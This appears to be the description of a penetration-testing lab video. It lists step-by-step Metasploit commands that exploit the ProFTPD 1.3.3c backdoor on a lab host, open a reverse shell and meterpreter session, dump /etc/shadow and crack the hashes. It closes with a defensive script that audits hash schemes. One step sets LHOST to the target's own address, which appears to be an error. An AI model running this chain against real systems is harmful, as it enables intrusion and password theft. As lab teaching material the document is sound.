Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!
Author: Daryl Shows His Work
Uploaded: 2025-12-04
Views: 8
Description:
Commands Used (in the order that they appear in the video):
1. ifconfig
2. fping -a -g 192.34.189.0/24
3. nmap -sV 192.34.189.3
4. searchsploit ProFTPD
5. Find the ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)
6. service postgresql start && msfconsole
7. workspace -a HASH
8. workspace
9. db_status
10. setg RHOSTS 192.34.189.3
11. search proftpd
12. use exploit/unix/ftp/proftpd_133c_backdoor
13. show options
14. set LHOST 192.34.189.3
15. set payload payload/cmd/unix/reverse
16. exploit (will automatically put us in shell session)
17. whoami
18. ls
19. /bin/bash -i (to start bash session as root)
20. id
21. Ctrl + z to background shell session
22. sessions (to see background session)
23. sessions -u 1 (to turn session into a meterpreter session)
24. sessions
25. sessions 2 (to switch to meterpreter session)
26. sysinfo
27. getuid
28. cat /etc/shadow (to display the contents of the shadow password file; the $6 prefix tells us SHA512 is being used)
29. Ctrl + z (to background meterpreter session)
30. search hashdump
31. use post/linux/gather/hashdump (will gather and dump all hashed passwords into a txt file)
32. show options
33. set SESSION 2 (to set session parameter to meterpreter session)
34. run
35. search crack_linux
36. use auxiliary/analyze/crack_linux (uses john the ripper by default)
37. show options
38. set SHA512 true (to turn on SHA512 cracking; $6 told us that our password hash is using this function)
39. run
40. Cracked password should be "password"
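
Step 28 reads the hash scheme off the `$6` prefix in /etc/shadow. The following is an added example, not from the video or its author: an audit script that classifies every shadow entry by its crypt(3) prefix and flags entries worth reviewing. It goes beyond `$6` to the other common prefixes; the sample file, its salts and its hash strings are constructed placeholders.

```python
# Added example: classify /etc/shadow entries by crypt(3) hash scheme for an audit.
# SAMPLE_SHADOW is constructed; salts and hashes are placeholders, not real hashes.
SCHEMES = {  # crypt(3) id -> (scheme name, flag for review?)
    "1": ("MD5-crypt", True),
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "5": ("SHA-256-crypt", False),
    "6": ("SHA-512-crypt", False),
    "y": ("yescrypt", False),
}

SAMPLE_SHADOW = """\
root:$6$CONSTRUCTEDSALT$PLACEHOLDERHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
olduser:$1$CONSTRUCTED$PLACEHOLDERHASH:19000:0:99999:7:::
svc:!$6$rounds=5000$CONSTRUCTED$PLACEHOLDERHASH:19000:0:99999:7:::
legacy:PLACEHOLDERXX:19000:0:99999:7:::
nopass::19000:0:99999:7:::
"""

def classify(field):
    """Return (scheme, needs_review) for the password field of a shadow line."""
    if field == "":
        return ("EMPTY (no password required)", True)
    if not field.strip("!*"):           # "*", "!", "!!": no usable password
        return ("locked/no login", False)
    locked = field.startswith("!")      # "!" in front of a hash = locked account
    body = field.lstrip("!")
    if body.startswith("$"):
        parts = body.split("$")         # ["", id, (rounds=N,) salt, hash]
        ident = parts[1] if len(parts) > 2 else ""
        name, weak = SCHEMES.get(ident, ("unknown $" + ident + "$", True))
    else:
        name, weak = ("DES-crypt (traditional)", True)
    return (name + (" [locked]" if locked else ""), weak)

def audit(shadow_text):
    """Map each account name to its (scheme, needs_review) classification."""
    findings = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] and not line.startswith("#"):
            findings[fields[0]] = classify(fields[1])
    return findings

if __name__ == "__main__":
    for user, (scheme, weak) in audit(SAMPLE_SHADOW).items():
        print(f"{user:8} {scheme:32} {'REVIEW' if weak else 'ok'}")
```

An "ok" here only describes the hash scheme: step 40 shows a `$6` hash still falling to a wordlist when the password is "password", so password policy has to be checked separately.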